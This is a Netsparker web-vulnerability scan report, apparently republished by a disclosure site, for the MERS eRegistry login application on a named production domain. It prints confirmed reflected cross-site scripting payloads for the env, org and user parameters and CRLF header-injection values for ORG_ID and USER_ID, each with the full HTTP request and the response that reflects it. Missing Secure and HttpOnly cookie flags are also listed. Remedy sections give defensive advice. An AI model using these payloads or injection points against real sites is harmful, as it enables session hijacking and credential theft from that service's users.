XSS, Cross Site Scripting in www.merseregistryonline.org, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
Netsparker - Scan Report Summary
TARGET URL
 https://www.merseregistryonline.org/eRegistry...
SCAN DATE
 7/25/2011 4:24:35 PM
REPORT DATE
 7/25/2011 6:43:49 PM
SCAN DURATION
 00:44:39

Total Requests

Average Speed

req/sec.
14
identified
9
confirmed
0
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
57 %
MEDIUM
14 %
LOW
14 %
INFORMATION
14 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/eRegistry/global/e_header2.jsp env GET Cross-site Scripting Yes
/eRegistry/security/ Forbidden Resource Yes
/eRegistry/security/e_challengeframe.jsp env GET Cross-site Scripting Yes
org GET Cross-site Scripting Yes
user GET Cross-site Scripting Yes
ORG_ID POST Cross-site Scripting No
USER_ID POST Cross-site Scripting No
/eRegistry/security/e_errorlogonframe.jsp env GET Cross-site Scripting Yes
/eRegistry/security/e_logon.jsp Auto Complete Enabled Yes
E-mail Address Disclosure No
/eRegistry/security/e_validatelogon.jsp Cookie Not Marked As Secure Yes
ORG_ID POST HTTP Header Injection No
USER_ID POST HTTP Header Injection No
Cookie Not Marked As HttpOnly Yes
Cross-site Scripting

Cross-site Scripting
7 TOTAL
IMPORTANT
CONFIRMED
5
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /eRegistry/global/e_header2.jsp

/eRegistry/global/e_header2.jsp CONFIRMED

https://www.merseregistryonline.org/eRegistry/global/e_header2.jsp?env='%22--%3E%3C/style%3E%3C/scri..

Parameters

Parameter Type Value
env GET '"--></style></script><script>alert(0x000167)</script>

Request

GET /eRegistry/global/e_header2.jsp?env='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000167)%3C/script%3E HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_errorlogonframe.jsp?env=www.merseregistryonline.org
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.merseregistryonline.org
Cookie: JSESSIONID=atjo9yxc7178
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 21:25:08 GMT
Server: Apache
content-type: text/html; charset=iso-8859-1
content-length: 981



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>

<link rel="stylesheet" type="text/css" href="../scripts/e_header.css">

<HEAD>
<META NAME=SERVERLANGUAGE CONTENT=JavaScript HTTP-EQUIV=PowerSiteData>
<TITLE>MERS eRegistry</TITLE>
<META content="text/html; charset=windows-1252" http-equiv="Content-Type">
<BASE target=header>
</HEAD>
<BODY>
<!--BEGINNING OF HEADER-->
<TABLE width='100%' class='main_table'>
<TR>
<TD width=155>
<IMG src="../images/eregistry.gif">
</TD>
<TH>
<IMG src="../images/processloans.gif">
</TH>
<TD width=200>
<TABLE class='env_table'>
<TR>
<TD width=120>

'"--></style></script><script>netsparker(0x000167)</script>
</TD>
</TR>
</TABLE>
</TD>
</TR>
</TABLE>
<!--END OF HEADER-->
</BODY>
</HTML>
- /eRegistry/security/e_errorlogonframe.jsp

/eRegistry/security/e_errorlogonframe.jsp CONFIRMED

https://www.merseregistryonline.org/eRegistry/security/e_errorlogonframe.jsp?env='%20stYle='x:expre/..

Parameters

Parameter Type Value
env GET ' stYle='x:expre/**/ssion(alert(9))

Request

GET /eRegistry/security/e_errorlogonframe.jsp?env='%20stYle='x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_validatelogon.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.merseregistryonline.org
Cookie: JSESSIONID=1gqy2xftba8c
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 21:25:24 GMT
Server: Apache
content-type: text/html; charset=iso-8859-1
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: JSESSIONID=13x96684f7rtl;Path=/eRegistry
content-length: 426


<!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="85,*" border=0 framespacing=0 frameborder=0>

<FRAME scrolling=no target=header NAME="MERS eRegistry" SRC=../global/e_header2.jsp?env=' stYle='x:expre/**/ssion(netsparker(9))>
<FRAMESET cols="*">
<FRAME scrolling=auto NAME=main SRC="e_errorlogon.htm">
</FRAMESET>
</FRAMESET>
</HTML>
- /eRegistry/security/e_challengeframe.jsp

/eRegistry/security/e_challengeframe.jsp CONFIRMED

https://www.merseregistryonline.org/eRegistry/security/e_challengeframe.jsp?env=%22%20stYle=%22x:exp..

Parameters

Parameter Type Value
env GET " stYle="x:expre/**/ssion(alert(9))
org GET null
user GET null

Request

GET /eRegistry/security/e_challengeframe.jsp?env=%22%20stYle=%22x:expre/**/ssion(netsparker(9))%20&org=null&user=null HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_validatelogon.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.merseregistryonline.org
Cookie: JSESSIONID=bjeqddna2m4e
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 21:25:36 GMT
Server: Apache
content-type: text/html; charset=iso-8859-1
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: JSESSIONID=178wsgga89kig;Path=/eRegistry
content-length: 624


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META NAME=SERVERLANGUAGE CONTENT=JavaScript HTTP-EQUIV=PowerSiteData>
<TITLE>MERS eRegistry</TITLE>
<META content="text/html; charset=windows-1252" http-equiv="Content-Type">
</HEAD>

<FRAMESET rows="85,*" border="0" framespacing="0" frameborder="0">
<FRAME scrolling="no" noresize NAME="MERS eRegistry Application" target="header" SRC="../global/e_header2.jsp?env=" stYle="x:expre/**/ssion(netsparker(9)) ">
<FRAME scrolling="auto" NAME="main" SRC="e_challenge.jsp?ORG_ID=null&USER_ID=null">
</FRAMESET>
</HTML>
- /eRegistry/security/e_challengeframe.jsp

/eRegistry/security/e_challengeframe.jsp CONFIRMED

https://www.merseregistryonline.org/eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonl..

Parameters

Parameter Type Value
env GET www.merseregistryonline.org
org GET " stYle=x:expre/**/ssion(alert(9)) ns="
user GET null

Request

GET /eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonline.org&org=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%20&user=null HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_validatelogon.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.merseregistryonline.org
Cookie: JSESSIONID=1mxz944klcs1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 21:30:41 GMT
Server: Apache
content-type: text/html; charset=iso-8859-1
content-length: 651


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META NAME=SERVERLANGUAGE CONTENT=JavaScript HTTP-EQUIV=PowerSiteData>
<TITLE>MERS eRegistry</TITLE>
<META content="text/html; charset=windows-1252" http-equiv="Content-Type">
</HEAD>

<FRAMESET rows="85,*" border="0" framespacing="0" frameborder="0">
<FRAME scrolling="no" noresize NAME="MERS eRegistry Application" target="header" SRC="../global/e_header2.jsp?env=www.merseregistryonline.org">
<FRAME scrolling="auto" NAME="main" SRC="e_challenge.jsp?ORG_ID=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &USER_ID=null">
</FRAMESET>
</HTML>
- /eRegistry/security/e_challengeframe.jsp

/eRegistry/security/e_challengeframe.jsp CONFIRMED

https://www.merseregistryonline.org/eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonl..

Parameters

Parameter Type Value
env GET www.merseregistryonline.org
org GET null
user GET " stYle="x:expre/**/ssion(alert(9))

Request

GET /eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonline.org&org=null&user=%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_validatelogon.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.merseregistryonline.org
Cookie: JSESSIONID=1mxz944klcs1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 21:31:19 GMT
Server: Apache
content-type: text/html; charset=iso-8859-1
content-length: 646


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META NAME=SERVERLANGUAGE CONTENT=JavaScript HTTP-EQUIV=PowerSiteData>
<TITLE>MERS eRegistry</TITLE>
<META content="text/html; charset=windows-1252" http-equiv="Content-Type">
</HEAD>

<FRAMESET rows="85,*" border="0" framespacing="0" frameborder="0">
<FRAME scrolling="no" noresize NAME="MERS eRegistry Application" target="header" SRC="../global/e_header2.jsp?env=www.merseregistryonline.org">
<FRAME scrolling="auto" NAME="main" SRC="e_challenge.jsp?ORG_ID=null&USER_ID=" stYle="x:expre/**/ssion(netsparker(9))">
</FRAMESET>
</HTML>
- /eRegistry/security/e_challengeframe.jsp

/eRegistry/security/e_challengeframe.jsp

https://www.merseregistryonline.org/eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonl..

Parameters

Parameter Type Value
env GET www.merseregistryonline.org
org GET '"--></style></script><script>netsparker(0x000199)</script>
user GET 3
ORG_ID POST '"--></style></script><script>alert(0x000199)</script>

Request

GET /eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonline.org&org='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000199)%3C/script%3E&user=3 HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_validatelogon.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.merseregistryonline.org
Cookie: JSESSIONID=9tnw6mdrlu19
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 21:25:30 GMT
Server: Apache
content-type: text/html; charset=iso-8859-1
content-length: 662


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META NAME=SERVERLANGUAGE CONTENT=JavaScript HTTP-EQUIV=PowerSiteData>
<TITLE>MERS eRegistry</TITLE>
<META content="text/html; charset=windows-1252" http-equiv="Content-Type">
</HEAD>

<FRAMESET rows="85,*" border="0" framespacing="0" frameborder="0">
<FRAME scrolling="no" noresize NAME="MERS eRegistry Application" target="header" SRC="../global/e_header2.jsp?env=www.merseregistryonline.org">
<FRAME scrolling="auto" NAME="main" SRC="e_challenge.jsp?ORG_ID='"--></style></script><script>netsparker(0x000199)</script>&USER_ID=3">
</FRAMESET>
</HTML>
- /eRegistry/security/e_challengeframe.jsp

/eRegistry/security/e_challengeframe.jsp

https://www.merseregistryonline.org/eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonl..

Parameters

Parameter Type Value
env GET www.merseregistryonline.org
org GET 3
user GET '"--></style></script><script>netsparker(0x0001F6)</script>
USER_ID POST '"--></style></script><script>alert(0x0001F6)</script>

Request

GET /eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonline.org&org=3&user='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F6)%3C/script%3E HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_validatelogon.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.merseregistryonline.org
Cookie: JSESSIONID=1mxz944klcs1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 21:47:18 GMT
Server: Apache
content-type: text/html; charset=iso-8859-1
content-length: 662


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META NAME=SERVERLANGUAGE CONTENT=JavaScript HTTP-EQUIV=PowerSiteData>
<TITLE>MERS eRegistry</TITLE>
<META content="text/html; charset=windows-1252" http-equiv="Content-Type">
</HEAD>

<FRAMESET rows="85,*" border="0" framespacing="0" frameborder="0">
<FRAME scrolling="no" noresize NAME="MERS eRegistry Application" target="header" SRC="../global/e_header2.jsp?env=www.merseregistryonline.org">
<FRAME scrolling="auto" NAME="main" SRC="e_challenge.jsp?ORG_ID=3&USER_ID='"--></style></script><script>netsparker(0x0001F6)</script>">
</FRAMESET>
</HTML>
Cookie Not Marked As Secure

Cookie Not Marked As Secure
1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /eRegistry/security/e_validatelogon.jsp

/eRegistry/security/e_validatelogon.jsp CONFIRMED

https://www.merseregistryonline.org/eRegistry/security/e_validatelogon.jsp

Identified Cookie

JSESSIONID

Request

POST /eRegistry/security/e_validatelogon.jsp HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_logon.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.merseregistryonline.org
Cookie: JSESSIONID=1bgh3uoo800li
Content-Length: 57
Accept-Encoding: gzip, deflate

forgotButton=Forgot+My+Password&LOGONSUBMIT=Logon&PASSWD=

Response

HTTP/1.1 302 Found
Date: Mon, 25 Jul 2011 21:24:33 GMT
Server: Apache
content-type: text/html; charset=ISO-8859-1
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: JSESSIONID=1a56m84cxpny8;Path=/eRegistry
location: https://www.merseregistryonline.org/eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonline.org&org=null&user=null
content-length: 0


HTTP Header Injection

HTTP Header Injection
2 TOTAL
MEDIUM
A CRLF (New line) injection in HTTP headers was identified. This means that the input goes into HTTP headers without proper input filtering.

Impact

Depending on the application. An attacker might carry out the following forms of attacks:

Actions to Take

  1. See the remedy for solution.
  2. Ensure the server security patches are up to date and that the current stable version of the software is in use.

Remedy

Do not allow newline characters in input. Where possible use strict white listing.

Required Skills for Successful Exploitation

Crafting the attack to exploit this issue is not a complex process. However most of the unsophisticated attackers will not know that such an attack is possible. Also an attacker needs to reach his victim by an e-mail or other similar method in order to entice them to visit the site or click upon a URL.

External References

- /eRegistry/security/e_validatelogon.jsp

/eRegistry/security/e_validatelogon.jsp

https://www.merseregistryonline.org/eRegistry/security/e_validatelogon.jsp

Parameters

Parameter Type Value
ORG_ID POST http://example.com/? ns: netsparker056650=vuln
USER_ID POST 3
PASSWD POST 3
LOGONSUBMIT POST Logon
forgotButton POST Forgot My Password

Request

POST /eRegistry/security/e_validatelogon.jsp HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_logon.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.merseregistryonline.org
Cookie: JSESSIONID=1bviae5ds6h2v
Content-Length: 131
Accept-Encoding: gzip, deflate

ORG_ID=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&USER_ID=3&PASSWD=3&LOGONSUBMIT=Logon&forgotButton=Forgot+My+Password

Response

HTTP/1.1 302 Found
Date: Mon, 25 Jul 2011 21:25:17 GMT
Server: Apache
content-type: text/html; charset=ISO-8859-1
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: JSESSIONID=pnwwejtpsgh2;Path=/eRegistry
location: https://www.merseregistryonline.org/eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonline.org&org=http://example.com/?
ns: netsparker056650=vuln&user=3
content-length: 0


- /eRegistry/security/e_validatelogon.jsp

/eRegistry/security/e_validatelogon.jsp

https://www.merseregistryonline.org/eRegistry/security/e_validatelogon.jsp

Parameters

Parameter Type Value
ORG_ID POST 3
USER_ID POST http://example.com/? ns: netsparker056650=vuln
PASSWD POST 3
LOGONSUBMIT POST Logon
forgotButton POST Forgot My Password

Request

POST /eRegistry/security/e_validatelogon.jsp HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_logon.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.merseregistryonline.org
Cookie: JSESSIONID=5uzwwr22clu9
Content-Length: 131
Accept-Encoding: gzip, deflate

ORG_ID=3&USER_ID=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&PASSWD=3&LOGONSUBMIT=Logon&forgotButton=Forgot+My+Password

Response

HTTP/1.1 302 Found
Date: Mon, 25 Jul 2011 21:25:18 GMT
Server: Apache
content-type: text/html; charset=ISO-8859-1
location: https://www.merseregistryonline.org/eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonline.org&org=3&user=http://example.com/?
ns: netsparker056650=vuln
content-length: 0


Auto Complete Enabled

Auto Complete Enabled
1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /eRegistry/security/e_logon.jsp

/eRegistry/security/e_logon.jsp CONFIRMED

https://www.merseregistryonline.org/eRegistry/security/e_logon.jsp

Identified Field Name

PASSWD

Request

GET /eRegistry/security/e_logon.jsp HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_logonframe.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.merseregistryonline.org
Cookie: JSESSIONID=1dt587wx31sga
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 21:24:29 GMT
Server: Apache
content-type: text/html; charset=iso-8859-1
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: JSESSIONID=1ik3cf2rslw6e;Path=/eRegistry
content-length: 5109



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<link rel="stylesheet" type="text/css" href="../scripts/e_common.css">
<HEAD>
<META HTTP-EQUIV="PowerSiteData" NAME="SERVERLANGUAGE" CONTENT="Java">
<LINK href="../scripts/e_common.css" type="text/css" rel="stylesheet">
<META content="PB9.0.1.7048" name="GENERATOR">
<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
<SCRIPT language="javascript" src="../scripts/e_callHelp.js" type="text/javascript"></SCRIPT>
<SCRIPT language="JAVASCRIPT">
function inputvalidate() {
if (FORM1.PASSWD.value == "") {
alert ("Please enter a password to logon");
return false;
}
return commonvalidate();
}
function commonvalidate() {
if (FORM1.ORG_ID.value == "") {
alert("Please enter an Organization ID to logon");
return false;
}
if (FORM1.USER_ID.value == "") {
alert("Please enter a User ID to logon");
return false;
}
if (isNaN(FORM1.ORG_ID.value)) {
alert("Please enter a numeric Organization ID to logon");
return false;
}
return true;
}
</SCRIPT>
<SCRIPT language="JAVASCRIPT">
if (top.location == self.location )
{
top.location.href = "e_logonframe.htm";
}
</SCRIPT>
</HEAD>
<BODY language="JAVASCRIPT" onload="FORM1.ORG_ID.focus();" PSPARAMS="">




<BR><BR>
<FORM id="FORM1" name="FORM1" action="e_validatelogon.jsp" method="post" target="_top">
<TABLE class='gap' width="100%" border="0">
<TR>
<TD class="PageHeader2 ctr" align="middle">
MERS<SUP>&reg;</SUP> eRegistry
</TD>
</TR>
<TR>
<TD class='ctr'>
<TABLE class='entry' width='260' border=0>
<TR>
<TH colSpan=2>Please enter your logon credentials below.</TH>
</TR>
<TR>
<TD class=label width='140'>Organization ID:</TD>
<TD><INPUT id=ORG_ID name=ORG_ID size=12 maxLength=7></TD>
</TR>
<TR>
<TD class=label>User ID:</TD>
<TD><INPUT id=USER_ID name=USER_ID size=12 maxLength=8></TD>
</TR>
<TR>
<TD class=label>Password:</TD>
<TD><INPUT id=PASSWD name=PASSWD type=password size=12 maxLength=12></TD>
</TR>
</TABLE>
</TD>
</TR>
<TR><TD>&nbsp;</TD></TR>
<TR>
<TD class='ctr gap' >
<INPUT language="JavaScript" id="loginButton" type="submit" value="Logon" name="LOGONSUBMIT" onclick="return inputvalidate();">
</TD>
</TR>
</TABLE>
<P></P>
<TABLE width="100%">
<TR>
<TD class='ctr'>
<P class='help'>If you have forgotten your password, please enter your Organization ID and User ID and click "Forgot My Password".</P>
</TD>
</TR>
</TABLE>
<P></P>
<TABLE width="100%">
<TR>
<TD class='ctr'>
<INPUT language="JavaScript" value='Forgot My Password' id=forgotButton name=forgotButton type=submit onclick="return commonvalidate();">
</TD>
</TR>
</TABLE>

<TABLE width="100%">
<TR>
<TD class='ctr'>
<P class='help'><br>The 1st and 3rd Sundays of each month are system maintenance windows. <br>The
maintenance window is from 7:00 am to 11:00 pm Eastern Time.</P>
</TD>
</TR>
</TABLE>
</FORM>
<DIV class='NormalPageText ctr gap'>
If you have any questions pertaining to MERS<SUP>&reg;</SUP> eRegistry ,
please contact the MERS Help Desk at 1-888-680-6377<BR>or via
email to
<A href="mailto:eRegistryhelpdesk@mersinc.org">eRegistryhelpdesk@mersinc.org</A>. Please include your name and telephone number with the email.
</DIV>
<DIV class='copyright ctr gap'>
<HR align="center" width="360" SIZE="1"> <B>Copyright&copy; 2004 by
MERSCORP, Inc. 1-800-646-MERS (6377)</B> <BR>Other products or
company names are or may be trademarks <BR>or registered trademarks
and are the property of <BR>their respective holders.
</DIV>
<DIV class='ctr gap'>
<TABLE>
<TR>
<TD class='copyright ctr' width='300'>
<A href="http://www.microsoft.com/windows/ie/default.asp" target="_new"><IMG height="31" src="../images/msie_button.gif" width="88" border="0"> </A>
<BR>MERS Internet Application is best viewed with IE
</TD>
<TD class='copyright ctr' width='300'>
<A href="http://www.eds.com" target="_new"><IMG height="65" src="../images/edslogo.gif" width="109" border="0"> </A>
<BR>Web site created and supported by EDS
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /eRegistry/security/e_validatelogon.jsp

/eRegistry/security/e_validatelogon.jsp CONFIRMED

https://www.merseregistryonline.org/eRegistry/security/e_validatelogon.jsp

Identified Cookie

JSESSIONID

Request

POST /eRegistry/security/e_validatelogon.jsp HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_logon.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.merseregistryonline.org
Cookie: JSESSIONID=1bgh3uoo800li
Content-Length: 57
Accept-Encoding: gzip, deflate

forgotButton=Forgot+My+Password&LOGONSUBMIT=Logon&PASSWD=

Response

HTTP/1.1 302 Found
Date: Mon, 25 Jul 2011 21:24:33 GMT
Server: Apache
content-type: text/html; charset=ISO-8859-1
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: JSESSIONID=1a56m84cxpny8;Path=/eRegistry
location: https://www.merseregistryonline.org/eRegistry/security/e_challengeframe.jsp?env=www.merseregistryonline.org&org=null&user=null
content-length: 0


Forbidden Resource

Forbidden Resource
1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /eRegistry/security/

/eRegistry/security/ CONFIRMED

https://www.merseregistryonline.org/eRegistry/security/

Request

GET /eRegistry/security/ HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_logonframe.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.merseregistryonline.org
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Mon, 25 Jul 2011 21:24:29 GMT
Server: Apache
content-type: text/html; charset=iso-8859-1
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: JSESSIONID=1dt587wx31sga;Path=/eRegistry
content-length: 580
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<link rel="stylesheet" type="text/css" href="../scripts/e_common.css">
<TITLE>MERS OnLine Error</TITLE>
<META content="text/html; charset=windows-1252" http-equiv="Content-Type">
</HEAD>
<BODY>
<P class='ctr PageHeader3'>MERS<SUP>&reg;</SUP> eRegistry OnLine Error</P>
<P class='ctr'>We were unable to process your last request. Please try again.</P>
<P class='ctr'>If you still cannot access this page, please contact the MERS Help Desk at 1-888-680-6377.</P>
</BODY>
</HTML>
E-mail Address Disclosure

E-mail Address Disclosure
1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /eRegistry/security/e_logon.jsp

/eRegistry/security/e_logon.jsp

https://www.merseregistryonline.org/eRegistry/security/e_logon.jsp

Found E-mails

eRegistryhelpdesk@mersinc.org

Request

GET /eRegistry/security/e_logon.jsp HTTP/1.1
Referer: https://www.merseregistryonline.org/eRegistry/security/e_logonframe.htm
